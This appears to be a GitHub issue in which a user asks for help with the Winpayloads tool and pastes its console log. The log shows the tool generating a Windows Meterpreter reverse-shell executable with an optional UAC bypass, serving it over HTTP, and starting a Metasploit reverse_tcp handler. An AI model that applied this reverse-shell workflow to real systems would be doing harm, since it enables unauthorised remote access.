run promble....
xiaoparrot opened this issue · 1 comments
hi,i have finished .
when i run, it caues
choice:
================================================================================
Main Menu > 2
[] Press Enter For Default Port(4444)
[] Port>
[] Press Enter To Get Local Ip Automatically(192.168.68.101)
[] IP>
[] IP SET AS 192.168.68.101
[] PORT SET AS 4444
y*] Try UAC Bypass(Only Works For Local Admin Account)? y/[n]:
[] Windows 7 or 10? 7/[10]:7
[] Creating Payload using Pyinstaller...
▗ Ge
[*] Payload.exe Has Been Generated And Is Located Here: /root/winpayloads/Windows_Meterpreter_Reverse_Shell.exe
[*] Upload To Local Websever or (p)sexec? [y]/p/n: y
[*] Serving Payload On http://192.168.68.101:8000/Windows_Meterpreter_Reverse_Shell.exe
[-] Failed to connect to the database: could not connect to server: Connection refused
Is the server running on host "localhost" (::1) and accepting
TCP/IP connections on port 5432?
............................
.......................
Frustrated with proxy pivoting? Upgrade to layer-2 VPN pivoting with
Metasploit Pro -- learn more on http://rapid7.com/metasploit
=[ metasploit v4.16.3-dev ]
- -- --=[ 1677 exploits - 962 auxiliary - 296 post ]
- -- --=[ 495 payloads - 40 encoders - 9 nops ]
- -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
payload => windows/meterpreter/reverse_tcp
LPORT => 4444
LHOST => 0.0.0.0
autorunscript => multi_console_command -rc uacbypass.rc
ExitOnSession => false
[*] Exploit running as background job 0.
(
[*] Started reverse TCP handler on 0.0.0.0:4444
msf exploit(handler) > ----------------------------------------
Exception happened during processing of request from ('192.168.68.102', 44532)
Traceback (most recent call last):
File "/usr/lib/python2.7/SocketServer.py", line 290, in _handle_request_noblock
self.process_request(request, client_address)
File "/usr/lib/python2.7/SocketServer.py", line 318, in process_request
self.finish_request(request, client_address)
File "/usr/lib/python2.7/SocketServer.py", line 331, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/usr/lib/python2.7/SocketServer.py", line 654, in init
self.finish()
File "/usr/lib/python2.7/SocketServer.py", line 713, in finish
self.wfile.close()
File "/usr/lib/python2.7/socket.py", line 283, in close
self.flush()
File "/usr/lib/python2.7/socket.py", line 307, in flush
self._sock.sendall(view[write_offset:write_offset+buffer_size])
error: [Errno 32] 断开的管道
msf exploit(handler) >
,then i dont know the step??
please,my english no no
my os is Linux parrot 4.12.0-parrot6-amd64 #1 SMP Parrot 4.12.6-1parrot6 (2017-08-24) x86_64 GNU/Linux
python --version Python 2.7.13